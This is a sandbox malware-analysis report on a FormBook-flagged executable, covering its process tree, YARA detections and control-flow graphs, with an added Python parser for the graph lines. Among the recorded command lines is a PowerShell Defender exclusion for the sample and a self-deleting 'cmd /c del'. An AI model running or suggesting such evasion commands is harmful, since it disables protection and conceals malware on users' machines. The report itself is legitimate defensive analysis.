Start time: 10:49:19
Start date: 05/12/2024
Path: C:\Users\user\Desktop\JHnNxt6Pnb.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
Imagebase: 0x670000
File size: 635'904 bytes
MD5 hash: B631685C5EF9EE26DED25C76AB3EDA27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 3
Start time: 10:49:20
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
Imagebase: 0xc60000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 10:49:20
Start date: 05/12/2024
Path: C:\Users\user\Desktop\JHnNxt6Pnb.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
Imagebase: 0xfb0000
File size: 635'904 bytes
MD5 hash: B631685C5EF9EE26DED25C76AB3EDA27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 5
Start time: 10:49:20
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:49:21
Start date: 05/12/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff62d7d0000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4011430051.00000000115F5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 7
Start time: 10:49:23
Start date: 05/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff605670000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 10:49:25
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\SysWOW64\autoconv.exe"
Imagebase: 0x940000
File size: 842'752 bytes
MD5 hash: A705C2ACED7DDB71AFB87C4ED384BED6
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 10:49:31
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\ipconfig.exe"
Imagebase: 0xf60000
File size: 29'184 bytes
MD5 hash: 3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate
Has exited: false

Target ID: 10
Start time: 10:49:34
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
Imagebase: 0xa40000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 10:49:34
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 2.1%
Total number of Nodes: 141
Total number of Limit Nodes: 9

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: JD0
• API String ID: 0-2413711749
• Opcode ID: 0d9be54d21791483296c484539ee083ebfd32dfab878f86381b983686a952a9a
• Instruction ID: 820ad31e6be459058dc34cdbcf3671dc750af35576098cc5fc3b5ab6e1677987
• Opcode Fuzzy Hash: 0d9be54d21791483296c484539ee083ebfd32dfab878f86381b983686a952a9a
• Instruction Fuzzy Hash: ED413BB5E05209EFDB48CFA5C5446AEFFF2EF89300F2494AAC409A7365EB305A01DB50

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: JD0
• API String ID: 0-2413711749
• Opcode ID: 949abe774337f91afc3860cf881b001fb8193a64c4521d60b2cc5389446f1ce7
• Instruction ID: 215552bb1f07e3f27d7b0d8ce37e646323da061204fdb0f96aaa525b10652983
• Opcode Fuzzy Hash: 949abe774337f91afc3860cf881b001fb8193a64c4521d60b2cc5389446f1ce7
• Instruction Fuzzy Hash: BC413BB5E05209EFDB08DFA5C5446AEFBF2FB89300F24946A9409A7364EB309A01DB50

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00E3D556
• GetCurrentThread.KERNEL32 ref: 00E3D593
• GetCurrentProcess.KERNEL32 ref: 00E3D5D0
• GetCurrentThreadId.KERNEL32 ref: 00E3D629
Memory Dump Source
• Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 431e6c774d02b78ddcc8d0e12c33065331121332aad3ef705857a52db79aaec9
• Instruction ID: 18cd1af3be7cb0e3c68e272197bef256fced28e5683fc87178fa39aeff7fc618
• Opcode Fuzzy Hash: 431e6c774d02b78ddcc8d0e12c33065331121332aad3ef705857a52db79aaec9
• Instruction Fuzzy Hash: 915156B09007498FDB18DFA9E948B9EBFF1BB88314F248059E419B7390D7749984CF65

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00E3D556
• GetCurrentThread.KERNEL32 ref: 00E3D593
• GetCurrentProcess.KERNEL32 ref: 00E3D5D0
• GetCurrentThreadId.KERNEL32 ref: 00E3D629
Memory Dump Source
• Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: f5cf0ccddfd6de990a5bf88b5362d9fd554e83890946056a139ef2f55fce0e4e
• Instruction ID: 574ed19b2dd95c173d9a2f99904c0afbffddf8a9c6bd60cf8efb17ef51626061
• Opcode Fuzzy Hash: f5cf0ccddfd6de990a5bf88b5362d9fd554e83890946056a139ef2f55fce0e4e
• Instruction Fuzzy Hash: 785157B09007098FDB18DFAAE948B9EBBF1BB88314F248059E419B7390DB759944CF65

Control-flow Graph

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00E3B4A6
Memory Dump Source
• Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 78f4b4c8bc44cdcec5bd59080936a1c60c53f29cc6ec1de98e15623d28801609
• Instruction ID: 347149d83e39f2c2a735224c21801945e5b28e3f0291b099ea9d4952a9d9c7f5
• Opcode Fuzzy Hash: 78f4b4c8bc44cdcec5bd59080936a1c60c53f29cc6ec1de98e15623d28801609
• Instruction Fuzzy Hash: AD716770A00B058FD724DF6AD04875ABBF1FF88304F008A2DE59AEBA50DB75E945CB91

Control-flow Graph

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81E02
Memory Dump Source
• Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 677198392710110797d7e295dbc77f4b7f69656699aacd9abe70261919944da9
• Instruction ID: 195c59ed33ca67789cf89df8d24db7877485f236c10da2a35dd8793b76023d40
• Opcode Fuzzy Hash: 677198392710110797d7e295dbc77f4b7f69656699aacd9abe70261919944da9
• Instruction Fuzzy Hash: 6751B2B1D00349DFDB14DF99C984ADEBBB5BF88310F24822EE419AB250D775A946CF90

Control-flow Graph

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81E02
Memory Dump Source
• Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 0da5241737abb533ce20cab5cc871bcfffc74eecece7966fe2f4142a9e2367cd
• Instruction ID: ae78509641473dbe73bfc4e873dae9aea2282735fffba8b6f04fafc329027542
• Opcode Fuzzy Hash: 0da5241737abb533ce20cab5cc871bcfffc74eecece7966fe2f4142a9e2367cd
• Instruction Fuzzy Hash: 1B41B2B1D00349DFDB14DF99C984ADEBBB5BF48310F24822EE819AB210D775A846CF90

Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F84381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 9ccad42d638d770a0ede3355781633d43e92f7a6eaaccd4597cbf03f758e8d65
                                                                                                                              • Instruction ID: 6c7b2cecfc5fe31b7f9933445c87e19044d7ea563d1696af8faf707272a7ef77
                                                                                                                              • Opcode Fuzzy Hash: 9ccad42d638d770a0ede3355781633d43e92f7a6eaaccd4597cbf03f758e8d65
                                                                                                                              • Instruction Fuzzy Hash: 69414AB59003098FDB14DF99C448AAABBF5FF88314F25C45DE518AB321D775A841CFA0
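The `control_flow_graph` lines in these records are the IDA plugin's graph flattened to text: each basic block is a node number followed by its address range and any annotation (an imported API name such as CallWindowProcW, or `call <addr>` for an intra-module call), and edges appear as `src->dst`. The parser below is an added example, not part of the Joe Sandbox report or its tooling. The grammar is inferred from the lines on this page and is an assumption; the function names are ours. It rebuilds the graph from the serialised line of the CallWindowProcW record, finds the entry and exit blocks, and cross-checks that the `ref: 04F84381` address from the APIs list falls inside the block carrying the CallWindowProcW annotation.

```python
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the serialised graph copied from the CallWindowProcW record.
SAMPLE = (
    "control_flow_graph 147 4f80bfc-4f842fc 150 4f843ac-4f843cc call 4f80ad4 "
    "147->150 151 4f84302-4f84307 147->151 158 4f843cf-4f843dc 150->158 "
    "152 4f84309-4f84340 151->152 153 4f8435a-4f84392 CallWindowProcW 151->153 "
    "160 4f84349-4f84358 152->160 161 4f84342-4f84348 152->161 156 4f8439b-4f843aa "
    "153->156 157 4f84394-4f8439a 153->157 156->158 157->156 160->158 161->160"
)

_RANGE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")  # start-end, hex without 0x prefix
_EDGE = re.compile(r"^(\d+)->(\d+)$")             # src->dst, decimal node numbers


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    calls: List[str] = field(default_factory=list)  # e.g. "CallWindowProcW" or "call 4f80ad4"


@dataclass
class Cfg:
    blocks: Dict[int, Block]
    edges: List[Tuple[int, int]]

    def successors(self, node: int) -> List[int]:
        return [d for s, d in self.edges if s == node]

    def predecessors(self, node: int) -> List[int]:
        return [s for s, d in self.edges if d == node]


def parse_cfg(line: str) -> Cfg:
    """Grammar assumed from the report text (not a documented format):
    NODE := <decimal id> <hex>-<hex> ANNOT*   ANNOT := 'call' <hex> | <API name>
    EDGE := <id>-><id>.  Annotations attach to the most recently opened node."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Block] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        rng = _RANGE.match(tokens[i + 1]) if tok.isdigit() and i + 1 < len(tokens) else None
        if rng:
            current = Block(int(tok), int(rng.group(1), 16), int(rng.group(2), 16))
            blocks[current.node_id] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"annotation {tok!r} appears before any block")
        if tok == "call" and i + 1 < len(tokens):
            current.calls.append(f"call {tokens[i + 1]}")  # intra-module call target
            i += 2
        else:
            current.calls.append(tok)  # imported API name
            i += 1
    for s, d in edges:  # reject a graph whose edges point at blocks that were never defined
        if s not in blocks or d not in blocks:
            raise ValueError(f"edge {s}->{d} references an undefined block")
    return Cfg(blocks, edges)


def entry_nodes(cfg: Cfg) -> List[int]:
    """Blocks with no predecessors: the function entry."""
    return sorted(n for n in cfg.blocks if not cfg.predecessors(n))


def exit_nodes(cfg: Cfg) -> List[int]:
    """Blocks with no successors: returns or dead ends."""
    return sorted(n for n in cfg.blocks if not cfg.successors(n))


def api_blocks(cfg: Cfg) -> Dict[str, int]:
    """Map each annotation (API name or call target) to the block carrying it."""
    return {c: b.node_id for b in cfg.blocks.values() for c in b.calls}


def block_containing(cfg: Cfg, address: int) -> Optional[int]:
    """Block whose range covers an address, e.g. the 'ref:' address from the APIs list."""
    for b in cfg.blocks.values():
        if b.start <= address <= b.end:
            return b.node_id
    return None


def shortest_path(cfg: Cfg, src: int, dst: int) -> List[int]:
    """Breadth-first search over edges; [] when dst is unreachable from src."""
    parent: Dict[int, Optional[int]] = {src: None}
    queue = deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path: List[int] = []
            cur: Optional[int] = n
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            return path[::-1]
        for s in cfg.successors(n):
            if s not in parent:
                parent[s] = n
                queue.append(s)
    return []


if __name__ == "__main__":
    g = parse_cfg(SAMPLE)
    print("entry", entry_nodes(g), "exit", exit_nodes(g))
    print("annotated blocks", api_blocks(g))
    print("ref 04F84381 lies in block", block_containing(g, 0x04F84381))
    print("entry -> CallWindowProcW:", shortest_path(g, 147, api_blocks(g)["CallWindowProcW"]))
```

Run stand-alone, the script reports block 147 as the single entry, block 158 as the single exit, and places the `ref: 04F84381` address inside block 153, the one annotated with CallWindowProcW, reached along 147 -> 151 -> 153. The same parser applies to the CreateActCtxA, DuplicateHandle and GetModuleHandleW records further down, whose serialised graphs use the same notation.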

                                                                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                              control_flow_graph 164 e34610-e35f11 CreateActCtxA 167 e35f13-e35f19 164->167 168 e35f1a-e35f74 164->168 167->168 175 e35f83-e35f87 168->175 176 e35f76-e35f79 168->176 177 e35f89-e35f95 175->177 178 e35f98 175->178 176->175 177->178 180 e35f99 178->180 180->180
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00E35F01
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 360064ad361da3e894df36a141266051a504b04eb7d2be6e0d2a8370cb6c6432
                                                                                                                              • Instruction ID: 037d5e50ca7a304c9ccd0cf02c5d6afad0294440af270ae4376f3d6860dccf8d
                                                                                                                              • Opcode Fuzzy Hash: 360064ad361da3e894df36a141266051a504b04eb7d2be6e0d2a8370cb6c6432
                                                                                                                              • Instruction Fuzzy Hash: C341BF71D0071DCBDB24DFA9C84879EBBF5BB84704F60816AD408AB251DB756945CF90

                                                                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                              control_flow_graph 181 e35e44-e35e47 182 e35e54-e35f11 CreateActCtxA 181->182 184 e35f13-e35f19 182->184 185 e35f1a-e35f74 182->185 184->185 192 e35f83-e35f87 185->192 193 e35f76-e35f79 185->193 194 e35f89-e35f95 192->194 195 e35f98 192->195 193->192 194->195 197 e35f99 195->197 197->197
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00E35F01
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 44708e8696e61de52c93c62983035a0f96cd11803dfc5f1d99e561fff94478b6
                                                                                                                              • Instruction ID: c689fe39e794f5ed5d8f411bc30cf3dc000170807ae72f36f380270496718293
                                                                                                                              • Opcode Fuzzy Hash: 44708e8696e61de52c93c62983035a0f96cd11803dfc5f1d99e561fff94478b6
                                                                                                                              • Instruction Fuzzy Hash: 8B41BDB1D00B1DCFDB24DFAAC94878EBBB5BF88704F24816AD408AB251DBB55945CF50

                                                                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                              control_flow_graph 198 e3d718-e3d7b4 DuplicateHandle 199 e3d7b6-e3d7bc 198->199 200 e3d7bd-e3d7da 198->200 199->200
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D7A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: f137af5ab73304928f76d5d850cb5647b59de09f21d7851e0bd78e80e57c4f79
                                                                                                                              • Instruction ID: 6c378ddfbaf574a286c8c8760eb19009ed11557ed13e6c1c6351b4d2f5e1fd18
                                                                                                                              • Opcode Fuzzy Hash: f137af5ab73304928f76d5d850cb5647b59de09f21d7851e0bd78e80e57c4f79
                                                                                                                              • Instruction Fuzzy Hash: 8D21E0B59003499FDB10CFAAD984ADEBFF5EB88310F14801AE958B3350C378A954CFA5

                                                                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                              control_flow_graph 203 e3d720-e3d7b4 DuplicateHandle 204 e3d7b6-e3d7bc 203->204 205 e3d7bd-e3d7da 203->205 204->205
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D7A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: f2fb52578423a2d67fe266f29d2be30a9585e7b957dcf33baf99d37a4c007c3d
                                                                                                                              • Instruction ID: a6cf12a742fe93fb32e260b120ef1d499e6d31cd8eed5dd8fb38cb9c4e6c8f22
                                                                                                                              • Opcode Fuzzy Hash: f2fb52578423a2d67fe266f29d2be30a9585e7b957dcf33baf99d37a4c007c3d
                                                                                                                              • Instruction Fuzzy Hash: 0521E4B59003499FDB10CFAAD884ADEBFF8FB48310F14801AE918A3350C374A950CF65

                                                                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                              control_flow_graph 208 e3b440-e3b480 209 e3b482-e3b485 208->209 210 e3b488-e3b4b3 GetModuleHandleW 208->210 209->210 211 e3b4b5-e3b4bb 210->211 212 e3b4bc-e3b4d0 210->212 211->212
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3B4A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 257adcee4b8af1bc62bc59bb9be3774d8ebaca13d2a6826b1556afd091f45d2a
                                                                                                                              • Instruction ID: c4bab0bc4e4c2a125f2e9103bbd6778d74d8eafb910f03087e855e43244c2b63
                                                                                                                              • Opcode Fuzzy Hash: 257adcee4b8af1bc62bc59bb9be3774d8ebaca13d2a6826b1556afd091f45d2a
                                                                                                                              • Instruction Fuzzy Hash: B71102B5C003498FCB10DF9AC444A9EFBF4AB88324F10841AD529B7601D379A545CFA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c8fdae87f6bd1f81b97479b18ed6a3e5a79924639f9aa30f901995b922c74ed
                                                                                                                              • Instruction ID: a73ec4eb3d84603730600e6ccc83c3b9f9cbfd92f15159eff7ac4e0c2d159c9f
                                                                                                                              • Opcode Fuzzy Hash: 7c8fdae87f6bd1f81b97479b18ed6a3e5a79924639f9aa30f901995b922c74ed
                                                                                                                              • Instruction Fuzzy Hash: CF21F1B5604304DFDB08DF10D9C4F26BB65FB98324F24C17DEA0A0B256C336E856CAA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e00076b986848d3ba1095fd856cf00661b6f7ca5efb77dde8303e6a154a9dbe0
                                                                                                                              • Instruction ID: 93b18cefff0508ad00ca982aeed151f1d4efdee041c086178e1b9126a0308721
